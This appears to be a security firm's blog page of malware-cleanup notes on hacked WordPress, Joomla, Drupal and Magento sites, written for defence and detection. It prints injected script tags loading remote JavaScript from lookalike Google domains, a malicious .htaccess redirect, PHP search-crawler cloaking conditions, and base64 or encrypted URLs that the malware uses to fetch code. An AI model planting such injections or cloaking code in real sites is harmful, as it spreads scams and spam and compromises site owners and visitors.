Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

You might know Google popular services: AdWords, AdSense and DoubleClick. You might even know scripts and domains they use. For example, DoubleClick loads scripts from googleads.g.doubleclick.net and AdWords load a conversion tracker script from www.googleadservices.com/pagead/conversion.js.

<script type="text/javascript" 
  src="//www.googleadservices.com/pagead/conversion.js">
   </script>

Recently, we cleaned an infected WordPress site where every post in the wp_posts table was appended by the following script.


<script src="http://ads.googleadservices[.]at/counter.js" type="text/javascript"></script>

The same googleadservices domain, just on the .at TLD. Easy to confuse with the Google's one.

This domain can be also found in conditional mobile redirect rules in .htaccess

...
RewriteRule ^(.*)$ http://mobile.googleadservices[.]at [L,R=302]

If we open that counter.js script, we'll see that it creates a pop-up loading hxxp://googleads.g.doubleclick[.]cn.com/cfqv.cgi?18. Again, the same googleads.g.doubleclick domain as in DoubleClick but on .cn.com instead of .net.

In our experience. such domains usually redirect traffic to some ad network or to whoever pays for it. In this case, the pop-up always shows the usa-immigration-service[.]us site and it looks like the whole malware campaign was created (and doubleclick[.]cn.com and googleadservices[.]at were registered) specifically to promoted that immigration service site (which could easily be a scam).

You can see it if you check the IP addresses of each site:

  • ads.googleadservices[.]at 37.139.50.191 - dedicated server in Russia
  • googleads.g.doubleclick[.]cn.com - 37.139.50.190 - dedicated server in Russia
  • usa-immigration-service[.]us - 37.139.50.190 - dedicated server in Russia

Summary

  • Don't trust well know domains. Especially when they are misspelled or have a different TLD. Especially when they are found in the places where you didn't put them.
  • Don't trust obtrusive ads. If you see pop-up or redirects unrelated to sites you visit, the chances are they are scam.
  • When you clean your website, don't forget about the database. It can be infected too. We clean lots of sites with infected databases.

Many black hat SEO campaigns use cloaking on hacked sites. Malicious scripts only inject spammy content when search engine crawlers request web pages on compromised sites. This time we came across an unusual cloaking condition.

We've been watching one spam campaign that uses php functions with names like __e_accelerate or __e_accelerate_engine for quite a long time. It normally used this cloaking condition:


if ((substr(trim($_SERVER['REMOTE_ADDR']),0,6)=='74.125') || preg_match("/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i", $_SERVER['HTTP_USER_AGENT'])) {...

The spam is being injected only if web pages are requested from Google's IPs (Google has an IP range that begins with '74.125') or if the request's User-Agent header belongs to crawlers of the most popular search engines: Google, Bing, Yahoo, Ask, etc. This condition is more or less typical to cloaking conditions used by the majority of other black hat SEO campaigns.

To our surprise, recently we found a variation of that e_accelerate malware that had the following cloaking condition:


if (!preg_match("/(ahrefs|majestic|baidu)/i", $_SERVER['HTTP_USER_AGENT'])) {...

So now this malware injects spam to requests from both search crawlers and humans. They only hide their spam from Ahrefs.com, Majestic (ex MajesticSEO) and Baidu. The exclusion rules look unusual, don't they?

Let's try to figure out what's going on. When checking the injected spammy text, I can see that it has scripts that make the text invisible in browsers that execute JavaScript (i.e. all modern browsers) so it's safe to "show" it human visitors.

To understand why they hide their spam from Ahrefs, Majestic and Baidu, we should know what these sites do.

Baidu is the #1 Chinese search engine. By hiding spammy links from Baidu, they prevent them from ranking well in China. So they are simply are not interested in Chinese traffic.

Ahrefs and Majestic are SEO tools that allow to view backlink profiles for any domain. They have their own crawlers, and the volumes of pages indexed by these tools are not much smaller than Google's index. This means that if we check information for domains used in spammy links, we can easily find hacked sites that link back to them. So the goal of hiding spammy links from Ahrefs and Majestic is preventing easy discovery of the sites hacked by this campaign.

By the way, they currently promote these sites:
  • buycialistadalafil[.]org
  • buycheapsildenafils[.]com
  • writemypaper-online[.]us
  • buy-essayforcheap[.]xyz

... and despite of the spammers' efforts, Majestic has backlink profiles for some of them ;-)

This malware can be usually found in WordPress index.php or in Joomla! includes/defines.php files. If you need a professional help with cleanup, you can request it here

It's just a minor update about the "pseudo-darkleech" malware we've been following for about a year now.

We wrote that it can be usually located inside the wp-includes/nav-menu.php file in WordPress and in the includes/defines.php files in Joomla! sites. But these are not the only targeted CMS'. We also find Drupal sites infected by this malware. The includes/bootstrap.inc file is where this malware can be found in Drupal sites.

The malware fetches the code it injects into webpages from third-party servers. The URLs of those servers are encoded using the base64 algorithm, e.g.:


$url = base64_decode("aHR0cDovLzkzLjE4OS40Mi43Mi9ibG9nLz9mcmFnaWxlJnV0bV9zb3VyY2U9MjQ2NzoyNjAzODM6NDU1");

which decodes to hxxp://93 .189 .42 .72/blog/?fragile&utm_source=2467:260383:455

but there are versions that use a custom encryption/decryption algorithm.


$url = decrypt_url('a3d3czksLDI2Mi0xMjQtNjQtMjQ7LGFvbGQsPGFmd2IldnduXHBsdnFgZj41NTQxOzk1MTA3MTs5NDQ0');

Here's the decryption function:

so the decoded URL is hxxp://151 .217. 57 .178/blog/?beta&utm_source=66728:623428:777

The rest of the code doesn't change much so we reliably detect this malware when we clean sites, even if we didn't see pseudo-darkleech on some particular CMS before.

Some webmasters only check recently modified files when searching for malware. It may work sometimes, but many infections don't change files' time-stamps. There is the "touch" PHP function that allows to set whatever modification time to any file.

If hackers create a new file, they chose a time-stamp of some neighbor file. If they inject code into an existing file, they simply save its original modification date and then restore it after the injection.

Today I want to show you a piece of code that also sets fake modification date to malicious files:

In this case, the code picks a random date between a year and two years back from now.

Don't limit your searches to recently modified files. Make sure to scan all files on your server. You don't have to do it manually. Integrity control systems will make the task much easier. Of course, you need to be absolutely sure all your files are clean at the moment when you put them under integrity control. If you already suspect that some of the files may contain malicious code then hire professionals - we'll scan all your files for thousands of malware patterns.

We see quite a few sites with the following injected PHP code:

This malware contacts dfoiqweomxa[.]ru and fetches spam links from there. The spam mainly promotes Russian phishing and money laundering sites. Infected sites can be found all around the world. We found this spam even on sites of American and international universities.

Do you remember SweetCAPTCHA that tried to monetize its WordPress plugin injecting unwanted ads into web pages?

Today we've found another CAPTCHA plugin with a suspicious code. We cleaned a site and our scanner reported a suspicious obfuscated code inside the Captcha on Login plugin (45,000+ all time installs) files.

The obfuscation had strings like this:

When we see such things, we always try to decode them to figure out whether it's legitimate or not.

Looks like that the owner of this plugin, called "Anderson Makiyama" is a Brazilian developer who is the owner of these affiliate marketing websites:
hxxp://hotplus .net .br/ plugin-hotlinks-plus/
hxxp://funildevendasparainiciante .com .br/ onde-divulgar-links-de-afiliados/

This plugin seems to be only showing these links inside the WordPress admin interface on the plugin options and report pages as "Other products of the author" (Outros Produtos do Autor). It's maybe a bit annoying but doesn't seem to be a big deal. It's natural for plugin developers to pitch their other products (even such questionable ones) on the internal plugin pages (not visible to site users).

The only problem is that link injecting code is obfuscated. Not only does it result in warnings produced by security scanners, but this practice is considered unacceptable by the official WordPress Plugin Directory guidelines:

4. No obfuscated code. We believe that obfuscated code violates the spirit, if not the letter, of the GPL license under which we operate....
...Intentionally obfuscated code is not the preferred form, and not allowed in the repository under any circumstances.

It's sad to see how plugins that are supposed to help stop hackers, actually do things that resemble what hackers do. Sometimes you can find such plugins even in the official WordPress plugin directory.

If you are looking for alternative solutions against brute force attacks, you can check our Website Firewall.

Recently I analyzed a porn doorway script and found an interesting way to obfuscate an IP address there.

As you know, IPv4 addresses consist of 4 bytes (values 0-255) separated by dots, e.g. 127.0.0.1

In the above code, you can see that each byte of the IP address $adr is represented by a string of dots, where the number of dots in the string is the byte value.

This give us the following IP address: 173 .236 .65 .24, which is used to generate a redirect URL for the doorway visitors:

header("Location: hxxp://$ard/input/?mark=20151119-$s");

In our case, the final redirect URL was hxxp://173 . 236 . 65 . 24/input/?mark=20151119-<hacked-site.com>/azq9mzo3v

This code was found in thousands of .php doorway files created by the attackers. This is the sort of a hack that may cause troubles even after you have completely cleaned your site. You can read about such scenarios on our blog. To prevent Googlebot from indexing and re-indexing tons of pages that shouldn't have been there in the first place, it may be a good idea to close spammy directories on your server with robots.txt directives.

If you find something like this on your server, it's only a tip of an iceberg. To stop the hackers, you need also to find and close all security holes (including the backdoors that they uploaded to your site). If you need a professional help in malware cleanup and site protection, please check our Website AntiVirus service.

Once active during the past summer, the g00[.]co script injections come with a new wave on infections this November.

The most common variation is

<script src="hxxp: / / g00[.]co/BtFVPd"></script>

This short URL hides the hxxp://yourjavascript[.]com/3921156982/not.js script, which in turn opens hxxp://speedclick[.]info/app/amung.php?c=a&s=<infected_domain> for visitors that come from Facebook, Google, Bing and Yahoo!

On the server side, the malware is mainly injected into WordPress theme files. Usually you can find the following PHP code (in one line. Line breaks added for readability) in either footer.php or functions.php

It injects that g00 script into all site URLs that don't contain wp-admin.

As always, if you need site security monitoring and cleanup services, you can count on us.

Early this morning we got complaints from our clients mentioning that Norton was flagging Helpscout, a Help Desk System.

Some of the pages were triggering this warning
http://i.snag.gy/Ttuys.jpg

Upon a quick check at Norton Safe Web, we can clearly see that a few files (4) were flagged by them
http://i.snag.gy/6IcbU.jpg

We tried accessing those to see if there was indeed any malicious content in it but all of them led to a "404 - Not Found" page. With that being said, all we can do at the moment is wait for Helpscout to ask Norton to review the "Blacklisting" status.

We worked on an infected Magento site that had unwanted pop-up ads when you visited it. The culprit was this injected script (spaces added intentionally)

It was found in the cms_block table of the Magento database.

This code uses the reverse() JavaScript function to dynamically inject a remote script directly from Pastebin.com - https: / / pastebin . com/raw .php?i = 9tWPBSzY. That’s not the first time we see hackers leveraging the Pastebin service

This time the raw pastebin code uses the same reverse() trick to inject the final remote script from hxxp: / / lachinampa . com . mx/stat/. That script has the actual pop-up code that uses the blablatrafic .com as the intermediary between other ad providers.

In some cases, the same pop-up code injection was noticed on WordPress sites. So this isn’t limited to Magento and you should check your files and database even if you are using a different CMS. Or have us scan your site for you.